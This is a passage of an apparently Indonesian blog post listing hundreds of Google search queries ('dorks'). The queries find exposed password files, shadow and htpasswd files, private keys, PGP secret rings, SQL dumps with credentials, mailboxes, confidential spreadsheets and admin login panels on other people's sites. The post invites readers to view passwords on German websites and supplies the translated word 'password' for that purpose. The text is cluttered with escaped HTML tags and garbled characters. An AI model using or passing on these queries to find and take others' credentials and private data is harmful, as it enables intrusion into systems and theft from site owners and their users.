user&lt;br /&gt;”defaultusername” intext: |credentials&lt;br /&gt;”defaultpassword”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:reg reg +intext: |Windows Registry Keys containing user&lt;br /&gt;”internet account manager” |credentials&lt;br /&gt;———————————————————&lt;br /&gt;“index of/” “ws_ftp.ini” |WS_FTP FTP credentials&lt;br /&gt;“parent directory”&lt;br /&gt;———————————————————&lt;br /&gt;filetype:ini ws_ftp pwd |WS_FTP FTP user credentials&lt;br /&gt;———————————————————&lt;br /&gt;inurl:/wwwboard |wwwboard user credentials&lt;br /&gt;———————————————————&lt;br /&gt;&lt;br /&gt;mungkin temen2 ada yang ingin melihat password dari website jerman?&lt;br /&gt;mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.&lt;br /&gt;&lt;br /&gt;—————————————————–&lt;br /&gt;BAHASA |KATA-KATA| TRANSLATE&lt;br /&gt;—————————————————–&lt;br /&gt;German |password | Kennwort&lt;br /&gt;Spanish |password | contraseña&lt;br /&gt;French |password | mot de passe&lt;br /&gt;Italian |password | parola d’accesso&lt;br /&gt;Portuguese |password | senha&lt;br /&gt;Dutch |password | Paswoord&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;admin account info” filetype:log&lt;br /&gt;!Host=*.* intext:enc_UserPassword=* ext:pcf&lt;br /&gt;“# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd&lt;br /&gt;“AutoCreate=TRUE password=*”&lt;br /&gt;“http://*:*@www” domainname&lt;br /&gt;“index of/” “ws_ftp.ini” “parent directory”&lt;br /&gt;“liveice configuration file” ext:cfg -site:sourceforge.net&lt;br /&gt;“parent directory” +proftpdpasswd&lt;br /&gt;Duclassified” -site:duware.com “DUware All Rights reserved”&lt;br /&gt;duclassmate” -site:duware.com&lt;br /&gt;Dudirectory” -site:duware.com&lt;br /&gt;dudownload” -site:duware.com&lt;br /&gt;Elite Forum Version *.*”&lt;br /&gt;Link Department”&lt;br /&gt;“sets mode: +k”&lt;br /&gt;“your password is” filetype:log&lt;br /&gt;DUpaypal” -site:duware.com&lt;br /&gt;allinurl: admin mdb&lt;br /&gt;auth_user_file.txt&lt;br /&gt;config.php&lt;br /&gt;eggdrop filetype:user user&lt;br /&gt;enable password | secret “current configuration” -intext:the&lt;br /&gt;etc (index.of)&lt;br /&gt;ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn&lt;br /&gt;&lt;br /&gt;ext:inc “pwd=” “UID=”&lt;br /&gt;ext:ini eudora.ini&lt;br /&gt;ext:ini Version=4.0.0.4 password&lt;br /&gt;ext:passwd -intext:the -sample -example&lt;br /&gt;ext:txt inurl:unattend.txt&lt;br /&gt;ext:yml database inurl:config&lt;br /&gt;filetype:bak createobject sa&lt;br /&gt;filetype:bak inurl:”htaccess|passwd|shadow|htusers”&lt;br /&gt;filetype:cfg mrtg “target&lt;br /&gt;filetype:cfm “cfapplication name” password&lt;br /&gt;filetype:conf oekakibbs&lt;br /&gt;filetype:conf slapd.conf&lt;br /&gt;filetype:config config intext:appSettings “User ID”&lt;br /&gt;filetype:dat “password.dat”&lt;br /&gt;filetype:dat inurl:Sites.dat&lt;br /&gt;filetype:dat wand.dat&lt;br /&gt;filetype:inc dbconn&lt;br /&gt;filetype:inc intext:mysql_connect&lt;br /&gt;filetype:inc mysql_connect OR mysql_pconnect&lt;br /&gt;filetype:inf sysprep&lt;br /&gt;filetype:ini inurl:”serv-u.ini”&lt;br /&gt;filetype:ini inurl:flashFXP.ini&lt;br /&gt;filetype:ini ServUDaemon&lt;br /&gt;filetype:ini wcx_ftp&lt;br /&gt;filetype:ini ws_ftp pwd&lt;br /&gt;filetype:ldb admin&lt;br /&gt;filetype:log “See `ipsec –copyright”&lt;br /&gt;filetype:log inurl:”password.log”&lt;br /&gt;filetype:mdb inurl:users.mdb&lt;br /&gt;filetype:mdb wwforum&lt;br /&gt;filetype:netrc password&lt;br /&gt;filetype:pass pass intext:userid&lt;br /&gt;filetype:pem intext:private&lt;br /&gt;filetype:properties inurl:db intext:password&lt;br /&gt;filetype:pwd service&lt;br /&gt;filetype:pwl pwl&lt;br /&gt;filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”&lt;br /&gt;filetype:reg reg +intext:â? WINVNC3â?&lt;br /&gt;filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS&lt;br /&gt;filetype:sql “insert into” (pass|passwd|password)&lt;br /&gt;filetype:sql (“values * MD5″ | “values * password” | “values * encrypt”)&lt;br /&gt;filetype:sql +”IDENTIFIED BY” -cvs&lt;br /&gt;filetype:sql password&lt;br /&gt;filetype:url +inurl:”ftp://” +inurl:”;@”&lt;br /&gt;filetype:xls username password email&lt;br /&gt;htpasswd&lt;br /&gt;htpasswd / htgroup&lt;br /&gt;htpasswd / htpasswd.bak&lt;br /&gt;intext:”enable password 7″&lt;br /&gt;intext:”enable secret 5 $”&lt;br /&gt;intext:”EZGuestbook”&lt;br /&gt;intext:”Web Wiz Journal”&lt;br /&gt;intitle:”index of” intext:connect.inc&lt;br /&gt;intitle:”index of” intext:globals.inc&lt;br /&gt;intitle:”Index of” passwords modified&lt;br /&gt;intitle:”Index of” sc_serv.conf sc_serv content&lt;br /&gt;intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”&lt;br /&gt;intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com&lt;br /&gt;intitle:index.of administrators.pwd&lt;br /&gt;intitle:Index.of etc shadow&lt;br /&gt;intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”&lt;br /&gt;intitle:rapidshare intext:login&lt;br /&gt;inurl:”calendars?ri?t/users.txt”&lt;br /&gt;inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”&lt;br /&gt;inurl:”GRC.DAT” intext:”password”&lt;br /&gt;inurl:”Sites.dat”+”PASS=”&lt;br /&gt;inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample&lt;br /&gt;inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample&lt;br /&gt;inurl:”wvdial.conf” intext:”password”&lt;br /&gt;inurl:/db/main.mdb&lt;br /&gt;inurl:/wwwboard&lt;br /&gt;inurl:/yabb/Members/Admin.dat&lt;br /&gt;inurl:ccbill filetype:log&lt;br /&gt;inurl:cgi-bin inurl:calendar.cfg&lt;br /&gt;inurl:chap-secrets -cvs&lt;br /&gt;inurl:config.php dbuname dbpass&lt;br /&gt;inurl:filezilla.xml -cvs&lt;br /&gt;inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man&lt;br /&gt;inurl:nuke filetype:sql&lt;br /&gt;inurl:ospfd.conf intext:password -sample -test -tutorial -download&lt;br /&gt;inurl:pap-secrets -cvs&lt;br /&gt;inurl:pass.dat&lt;br /&gt;inurl:perform filetype:ini&lt;br /&gt;inurl:perform.ini filetype:ini&lt;br /&gt;inurl:secring ext:skr | ext:pgp | ext:bak&lt;br /&gt;inurl:server.cfg rcon password&lt;br /&gt;inurl:ventrilo_srv.ini adminpassword&lt;br /&gt;inurl:vtund.conf intext:pass -cvs&lt;br /&gt;inurl:zebra.conf intext:password -sample -test -tutorial -download&lt;br /&gt;LeapFTP intitle:”index.of./” sites.ini modified&lt;br /&gt;master.passwd&lt;br /&gt;mysql history files&lt;br /&gt;NickServ registration passwords&lt;br /&gt;passlist&lt;br /&gt;passlist.txt (a better way)&lt;br /&gt;passwd&lt;br /&gt;passwd / etc (reliable)&lt;br /&gt;people.lst&lt;br /&gt;psyBNC config files&lt;br /&gt;pwd.db&lt;br /&gt;server-dbs “intitle:index of”&lt;br /&gt;signin filetype:url&lt;br /&gt;spwd.db / passwd&lt;br /&gt;trillian.ini&lt;br /&gt;wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin&lt;br /&gt;[WFClient] Password= filetype:ica&lt;br /&gt;intitle:”remote assessment” OpenAanval Console&lt;br /&gt;intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”&lt;br /&gt;“bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com&lt;br /&gt;“Emergisoft web applications are a part of our”&lt;br /&gt;“Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame – Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-&lt;br /&gt;“HostingAccelerator” intitle:”login” +”Username” -”news” -demo&lt;br /&gt;“iCONECT 4.1 :: Login”&lt;br /&gt;“IMail Server Web Messaging” intitle:login&lt;br /&gt;“inspanel” intitle:”login” -”cannot” “Login ID” -site:inspediumsoft.com&lt;br /&gt;“intitle:3300 Integrated Communications Platform” inurl:main.htm&lt;br /&gt;“Login – Sun Cobalt RaQ”&lt;br /&gt;“login prompt” inurl:GM.cgi&lt;br /&gt;“Login to Usermin” inurl:20000&lt;br /&gt;“Microsoft CRM : Unsupported Browser Version”&lt;br /&gt;“OPENSRS Domain Management” inurl:manage.cgi&lt;br /&gt;“pcANYWHERE EXPRESS Java Client”&lt;br /&gt;“Please authenticate yourself to get access to the management interface”&lt;br /&gt;“please log in”&lt;br /&gt;“Please login with admin pass” -”leak” -sourceforge&lt;br /&gt;CuteNews” “2003..2005 CutePHP”&lt;br /&gt;DWMail” password intitle:dwmail&lt;br /&gt;Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com&lt;br /&gt;Midmart Messageboard” “Administrator Login”&lt;br /&gt;Monster Top List” MTL numrange:200-&lt;br /&gt;UebiMiau” -site:sourceforge.net&lt;br /&gt;“site info for” “Enter Admin Password”&lt;br /&gt;“SquirrelMail version” “By the SquirrelMail development Team”&lt;br /&gt;“SysCP – login”&lt;br /&gt;“This is a restricted Access Server” “Javas?ri?t Not Enabled!”|”Messenger Express” -edu -ac&lt;br /&gt;“This section is for Administrators only. If you are an administrator then please”&lt;br /&gt;“ttawlogin.cgi/?action=”&lt;br /&gt;“VHCS Pro ver” -demo&lt;br /&gt;“VNC Desktop” inurl:5800&lt;br /&gt;“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com&lt;br /&gt;“WebExplorer Server – Login” “Welcome to WebExplorer Server”&lt;br /&gt;“WebSTAR Mail – Please Log In”&lt;br /&gt;“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”&lt;br /&gt;“You have requested to access the management functions” -.edu&lt;br /&gt;(intitle:”Please login – Forums&lt;br /&gt;UBB.threads”)|(inurl:login.php “ubb”)&lt;br /&gt;(intitle:”Please login – Forums&lt;br /&gt;WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)&lt;br /&gt;(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family&lt;br /&gt;(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)&lt;br /&gt;(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil&lt;br /&gt;4images Administration Control Panel&lt;br /&gt;allintitle:”Welcome to the Cyclades”&lt;br /&gt;allinurl:”exchange/logon.asp”&lt;br /&gt;allinurl:wps/portal/ login&lt;br /&gt;ASP.login_aspx “ASP.NET_SessionId”&lt;br /&gt;CGI:IRC Login&lt;br /&gt;ext:cgi intitle:”control panel” “enter your owner password to continue!”&lt;br /&gt;ez Publish administration&lt;br /&gt;filetype:php inurl:”webeditor.php”&lt;br /&gt;filetype:pl “Download: SuSE Linux Openexchange Server CA”&lt;br /&gt;filetype:r2w r2w&lt;br /&gt;intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”&lt;br /&gt;intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu&lt;br /&gt;intext:”Mail admins login here to administrate your domain.”&lt;br /&gt;intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin&lt;br /&gt;intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin&lt;br /&gt;intext:”Storage Management Server for” intitle:”Server Administration”&lt;br /&gt;intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee&lt;br /&gt;intext:”vbulletin” inurl:admincp&lt;br /&gt;intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press&lt;br /&gt;intitle:”Admin Login” “admin login” “blogware”&lt;br /&gt;intitle:”Admin login” “Web Site Administration” “Copyright”&lt;br /&gt;intitle:”AlternC Desktop”&lt;br /&gt;intitle:”Athens Authentication Point”&lt;br /&gt;intitle:”b2evo &gt; Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net&lt;br /&gt;intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co&lt;br /&gt;intitle:”ColdFusion Administrator Login”&lt;br /&gt;intitle:”communigate pro * *” intitle:”entrance”&lt;br /&gt;intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo&lt;br /&gt;intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo&lt;br /&gt;intitle:”Dell Remote Access Controller”&lt;br /&gt;intitle:”Docutek ERes – Admin Login” -edu&lt;br /&gt;intitle:”Employee Intranet Login”&lt;br /&gt;intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”&lt;br /&gt;intitle:”ePowerSwitch Login”&lt;br /&gt;intitle:”eXist Database Administration” -demo&lt;br /&gt;intitle:”EXTRANET * – Identification”&lt;br /&gt;intitle:”EXTRANET login” -.edu -.mil -.gov&lt;br /&gt;intitle:”EZPartner” -netpond&lt;br /&gt;intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists&lt;br /&gt;intitle:”i-secure v1.1″ -edu&lt;br /&gt;intitle:”Icecast Administration Admin Page”&lt;br /&gt;intitle:”iDevAffiliate – admin” -demo&lt;br /&gt;intitle:”ISPMan : Unauthorized Access prohibited”&lt;br /&gt;intitle:”ITS System Information” “Please log on to the SAP System”&lt;br /&gt;intitle:”Kurant Corporation StoreSense” filetype:bok&lt;br /&gt;intitle:”ListMail Login” admin -demo&lt;br /&gt;intitle:”Login -&lt;br /&gt;Easy File Sharing Web Server”&lt;br /&gt;intitle:”Login Forum&lt;br /&gt;AnyBoard” intitle:”If you are a new user:” intext:”Forum&lt;br /&gt;AnyBoard” inurl:gochat -edu&lt;br /&gt;intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman&lt;br /&gt;intitle:”Login to Cacti”&lt;br /&gt;intitle:”Login to the forums – @www.aimoo.com” inurl:login.cfm?id=&lt;br /&gt;intitle:”MailMan Login”&lt;br /&gt;intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi&lt;br /&gt;intitle:”Merak Mail Server Web Administration” -ihackstuff.com&lt;br /&gt;intitle:”microsoft certificate services” inurl:certsrv&lt;br /&gt;intitle:”MikroTik RouterOS Managing Webpage”&lt;br /&gt;intitle:”MX Control Console” “If you can’t remember”&lt;br /&gt;intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf&lt;br /&gt;intitle:”Novell Web Services” intext:”Select a service and a language.”&lt;br /&gt;intitle:”oMail-admin Administration – Login” -inurl:omnis.ch&lt;br /&gt;intitle:”OnLine Recruitment Program – Login”&lt;br /&gt;intitle:”Philex 0.2*” -s?ri?t -site:freelists.org&lt;br /&gt;intitle:”PHP Advanced Transfer” inurl:”login.php”&lt;br /&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;br /&gt;intitle:”php icalendar administration” -site:sourceforge.net&lt;br /&gt;intitle:”phpPgAdmin – Login” Language&lt;br /&gt;intitle:”PHProjekt – login” login password&lt;br /&gt;intitle:”please login” “your password is *”&lt;br /&gt;intitle:”Remote Desktop Web Connection” inurl:tsweb&lt;br /&gt;intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”&lt;br /&gt;intitle:”SHOUTcast Administrator” inurl:admin.cgi&lt;br /&gt;intitle:”site administration: please log in” “site designed by emarketsouth”&lt;br /&gt;intitle:”Supero Doctor III” -inurl:supermicro&lt;br /&gt;intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”&lt;br /&gt;intitle:”teamspeak server-administration&lt;br /&gt;intitle:”Tomcat Server Administration”&lt;br /&gt;intitle:”TOPdesk ApplicationServer”&lt;br /&gt;intitle:”TUTOS Login”&lt;br /&gt;intitle:”TWIG Login”&lt;br /&gt;intitle:”vhost” intext:”vHost . 2000-2004″&lt;br /&gt;intitle:”Virtual Server Administration System”&lt;br /&gt;intitle:”VisNetic WebMail” inurl:”/mail/”&lt;br /&gt;intitle:”VitalQIP IP Management System”&lt;br /&gt;intitle:”VMware Management Interface:” inurl:”vmware/en/”&lt;br /&gt;intitle:”VNC viewer for Java”&lt;br /&gt;intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org&lt;br /&gt;intitle:”WebLogic Server” intitle:”Console Login” inurl:console&lt;br /&gt;intitle:”Welcome Site/User Administrator” “Please select the language” -demos&lt;br /&gt;intitle:”Welcome to Mailtraq WebMail”&lt;br /&gt;intitle:”welcome to netware *” -site:novell.com&lt;br /&gt;intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”&lt;br /&gt;intitle:”xams 0.0.0..15 – Login”&lt;br /&gt;intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin&lt;br /&gt;intitle:”XMail Web Administration Interface” intext:Login intext:password&lt;br /&gt;intitle:”Zope Help System” inurl:HelpSys&lt;br /&gt;intitle:”ZyXEL Prestige Router” “Enter password”&lt;br /&gt;intitle:”inc. vpn 3000 concentrator”&lt;br /&gt;intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com&lt;br /&gt;intitle:asterisk.management.portal web-access&lt;br /&gt;intitle:endymion.sak?.mail.login.page | inurl:sake.servlet&lt;br /&gt;intitle:Group-Office “Enter your username and password to login”&lt;br /&gt;intitle:ilohamail ”&lt;br /&gt;IlohaMail”&lt;br /&gt;intitle:ilohamail intext:”Version 0.8.10″ ”&lt;br /&gt;IlohaMail”&lt;br /&gt;intitle:IMP inurl:imp/index.php3&lt;br /&gt;intitle:Login * Webmailer&lt;br /&gt;intitle:Login intext:”RT is ? Copyright”&lt;br /&gt;intitle:Node.List Win32.Version.3.11&lt;br /&gt;intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”&lt;br /&gt;intitle:open-xchange inurl:login.pl&lt;br /&gt;intitle:Ovislink inurl:private/login&lt;br /&gt;intitle:phpnews.login&lt;br /&gt;intitle:plesk inurl:login.php3&lt;br /&gt;inurl:”/admin/configuration. php?” Mystore&lt;br /&gt;inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”&lt;br /&gt;inurl:”1220/parse_xml.cgi?”&lt;br /&gt;inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)&lt;br /&gt;inurl:”:10000″ intext:webmin&lt;br /&gt;inurl:”Activex/default.htm” “Demo”&lt;br /&gt;inurl:”calendar.asp?action=login”&lt;br /&gt;inurl:”default/login.php” intitle:”kerio”&lt;br /&gt;inurl:”gs/adminlogin.aspx”&lt;br /&gt;inurl:”php121login.php”&lt;br /&gt;inurl:”suse/login.pl”&lt;br /&gt;inurl:”typo3/index.php?u=” -demo&lt;br /&gt;inurl:”usysinfo?login=true”&lt;br /&gt;inurl:”utilities/TreeView.asp”&lt;br /&gt;inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp&lt;br /&gt; Code:&lt;br /&gt; nurl:/admin/login.asp&lt;br /&gt;inurl:/cgi-bin/sqwebmail?noframes=1&lt;br /&gt;inurl:/Citrix/Nfuse17/&lt;br /&gt;inurl:/dana-na/auth/welcome.html&lt;br /&gt;inurl:/eprise/&lt;br /&gt;inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net&lt;br /&gt;inurl:/modcp/ intext:Moderator+vBulletin&lt;br /&gt;inurl:/SUSAdmin intitle:”Microsoft Software upd?t? Services”&lt;br /&gt;inurl:/webedit.* intext:WebEdit Professional -html&lt;br /&gt;inurl:1810 “Oracle Enterprise Manager”&lt;br /&gt;inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com&lt;br /&gt;inurl::2082/frontend -demo&lt;br /&gt;inurl:administrator “welcome to mambo”&lt;br /&gt;inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0&lt;br /&gt;inurl:cgi-bin/ultimatebb.cgi?ubb=login&lt;br /&gt;inurl:Citrix/MetaFrame/default/default.aspx&lt;br /&gt;inurl:confixx inurl:login|anmeldung&lt;br /&gt;inurl:coranto.cgi intitle:Login (Authorized Users Only)&lt;br /&gt;inurl:csCreatePro.cgi&lt;br /&gt;inurl:default.asp intitle:”WebCommander”&lt;br /&gt;inurl:exchweb/bin/auth/owalogon.asp&lt;br /&gt;inurl:gnatsweb.pl&lt;br /&gt;inurl:ids5web&lt;br /&gt;inurl:irc filetype:cgi cgi:irc&lt;br /&gt;inurl:login filetype:swf swf&lt;br /&gt;inurl:login.asp&lt;br /&gt;inurl:login.cfm&lt;br /&gt;inurl:login.php “SquirrelMail version”&lt;br /&gt;inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”&lt;br /&gt;inurl:mewebmail&lt;br /&gt;inurl:names.nsf?opendatabase&lt;br /&gt;inurl:ocw_login_username&lt;br /&gt;inurl:orasso.wwsso_app_admin.ls_login&lt;br /&gt;inurl:postfixadmin intitle:”postfix admin” ext:php&lt;br /&gt;inurl:search/admin.php&lt;br /&gt;inurl:textpattern/index.php&lt;br /&gt;inurl:WCP_USER&lt;br /&gt;inurl:webmail./index.pl “Interface”&lt;br /&gt;inurl:webvpn.html “login” “Please enter your”&lt;br /&gt;Login (”&lt;br /&gt;Jetbox One CMS â?¢” | ”&lt;br /&gt;Jetstream ? *”)&lt;br /&gt;Novell NetWare intext:”netware management portal version”&lt;br /&gt;Outlook Web Access (a better way)&lt;br /&gt;PhotoPost PHP Upload&lt;br /&gt;PHPhotoalbum Statistics&lt;br /&gt;PHPhotoalbum Upload&lt;br /&gt;phpWebMail&lt;br /&gt;Please enter a valid password! inurl:polladmin&lt;br /&gt; INDEXU&lt;br /&gt;Ultima Online loginservers&lt;br /&gt;W-Nailer Upload Area&lt;br /&gt;intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu&lt;br /&gt;“#mysql dump” filetype:sql&lt;br /&gt;“#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3&lt;br /&gt;“allow_call_time_pass_reference” “PATH_INFO”&lt;br /&gt;“Certificate Practice Statement” inurl:(PDF | DOC)&lt;br /&gt;“Generated by phpSystem”&lt;br /&gt;“generated by wwwstat”&lt;br /&gt;“Host Vulnerability Summary Report”&lt;br /&gt;“HTTP_FROM=googlebot” googlebot.com “Server_Software=”&lt;br /&gt;“Index of” / “chat/logs”&lt;br /&gt;“Installed Objects Scanner” inurl:default.asp&lt;br /&gt;“MacHTTP” filetype:log inurl:machttp.log&lt;br /&gt;“Mecury Version” “Infastructure Group”&lt;br /&gt;“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log&lt;br /&gt;“Most Submitted Forms and s?ri?ts” “this section”&lt;br /&gt;“Network Vulnerability Assessment Report”&lt;br /&gt;“not for distribution” confidential&lt;br /&gt;“not for public release” -.edu -.gov -.mil&lt;br /&gt;“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”&lt;br /&gt;“phpMyAdmin” “running on” inurl:”main.php”&lt;br /&gt;“produced by getstats”&lt;br /&gt;“Request Details” “Control Tree” “Server Variables”&lt;br /&gt;“robots.txt” “Disallow:” filetype:txt&lt;br /&gt;“Running in Child mode”&lt;br /&gt;“sets mode: +p”&lt;br /&gt;“sets mode: +s”&lt;br /&gt;“Thank you for your order” +receipt&lt;br /&gt;“This is a Shareaza Node”&lt;br /&gt;“This report was generated by WebLog”&lt;br /&gt;( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject&lt;br /&gt;(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher – Monitoring Results”)&lt;br /&gt;(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob&lt;br /&gt;(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt&lt;br /&gt;+”:8080″ +”:3128″ +”:80″ filetype:txt&lt;br /&gt;+”HSTSNR” -”netop.com”&lt;br /&gt;-site:php.net -”The PHP Group” inurl:source inurl:url ext:pHp&lt;br /&gt;94FBR “ADOBE PHOTOSHOP”&lt;br /&gt;AIM buddy lists&lt;br /&gt;allinurl:/examples/jsp/snp/snoop.jsp&lt;br /&gt;allinurl:cdkey.txt&lt;br /&gt;allinurl:servlet/SnoopServlet&lt;br /&gt;cgiirc.conf&lt;br /&gt;cgiirc.conf&lt;br /&gt;contacts ext:wml&lt;br /&gt;data filetype:mdb -site:gov -site:mil&lt;br /&gt;exported email addresses&lt;br /&gt;ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential&lt;br /&gt;ext:asp inurl:pathto.asp&lt;br /&gt;ext:ccm ccm -catacomb&lt;br /&gt;ext:CDX CDX&lt;br /&gt;ext:cgi inurl:editcgi.cgi inurl:file=&lt;br /&gt;ext:conf inurl:rsyncd.conf -cvs -man&lt;br /&gt;ext:conf NoCatAuth -cvs&lt;br /&gt;ext:dat bpk.dat&lt;br /&gt;ext:gho gho&lt;br /&gt;ext:ics ics&lt;br /&gt;ext:ini intext:env.ini&lt;br /&gt;ext:jbf jbf&lt;br /&gt;ext:ldif ldif&lt;br /&gt;ext:log “Software: Microsoft Internet Information Services *.*”&lt;br /&gt;ext:mdb inurl:*.mdb inurl:fpdb shop.mdb&lt;br /&gt;ext:nsf nsf -gov -mil&lt;br /&gt;ext:plist filetype:plist inurl:bookmarks.plist&lt;br /&gt;ext:pqi pqi -database&lt;br /&gt;ext:reg “username=*” putty&lt;br /&gt;ext:txt “Final encryption key”&lt;br /&gt;ext:txt inurl:dxdiag&lt;br /&gt;ext:vmdk vmdk&lt;br /&gt;ext:vmx vmx&lt;br /&gt;filetype:asp DBQ=” * Server.MapPath(“*.mdb”)&lt;br /&gt;filetype:bkf bkf&lt;br /&gt;filetype:blt “buddylist”&lt;br /&gt;filetype:blt blt +intext:screenname&lt;br /&gt;filetype:cfg auto_inst.cfg&lt;br /&gt;filetype:cnf inurl:_vti_pvt access.cnf&lt;br /&gt;filetype:conf inurl:firewall -intitle:cvs&lt;br /&gt;filetype:config web.config -CVS&lt;br /&gt;filetype:ctt Contact&lt;br /&gt;filetype:ctt ctt messenger&lt;br /&gt;filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”&lt;br /&gt;filetype:fp3 fp3&lt;br /&gt;filetype:fp5 fp5 -site:gov -site:mil -”cvs log”&lt;br /&gt;filetype:fp7 fp7&lt;br /&gt;filetype:inf inurl:capolicy.inf&lt;br /&gt;filetype:lic lic intext:key&lt;br /&gt;filetype:log access.log -CVS&lt;br /&gt;filetype:log cron.log&lt;br /&gt;filetype:mbx mbx intext:Subject&lt;br /&gt;filetype:myd myd -CVS&lt;br /&gt;filetype:ns1 ns1&lt;br /&gt;filetype:ora ora&lt;br /&gt;filetype:ora tnsnames&lt;br /&gt;filetype:pdb pdb backup (Pilot | Pluckerdb)&lt;br /&gt;filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net&lt;br /&gt;filetype:pot inurl:john.pot&lt;br /&gt;filetype:PS ps&lt;br /&gt;filetype:pst inurl:”outlook.pst”&lt;br /&gt;filetype:pst pst -from -to -date&lt;br /&gt;filetype:qbb qbb&lt;br /&gt;filetype:QBW qbw&lt;br /&gt;filetype:rdp rdp&lt;br /&gt;filetype:reg “Terminal Server Client”&lt;br /&gt;filetype:vcs vcs&lt;br /&gt;filetype:wab wab&lt;br /&gt;filetype:xls -site:gov inurl:contact&lt;br /&gt;filetype:xls inurl:”email.xls”&lt;br /&gt;Financial spreadsheets: finance.xls&lt;br /&gt;Financial spreadsheets: finances.xls&lt;br /&gt;Ganglia Cluster Reports&lt;br /&gt;haccess.ctl (one way)&lt;br /&gt;haccess.ctl (VERY reliable)&lt;br /&gt;ICQ chat logs, please…&lt;br /&gt;intext:”Session Start * * * *:*:* *” filetype:log&lt;br /&gt;intext:”Tobias Oetiker” “traffic analysis”&lt;br /&gt;intext:(password | passcode) intext:(username | userid | user) filetype:csv&lt;br /&gt;intext:gmail invite intext:http://gmail.google.com/gmail/a&lt;br /&gt;intext:SQLiteManager inurl:main.php&lt;br /&gt;intext:ViewCVS inurl:Settings.php&lt;br /&gt;intitle:”admin panel” +”&lt;br /&gt;RedKernel”&lt;br /&gt;intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)&lt;br /&gt;intitle:”AppServ Open Project” -site:www.appservnetwork.com&lt;br /&gt;intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”&lt;br /&gt;intitle:”Big Sister” 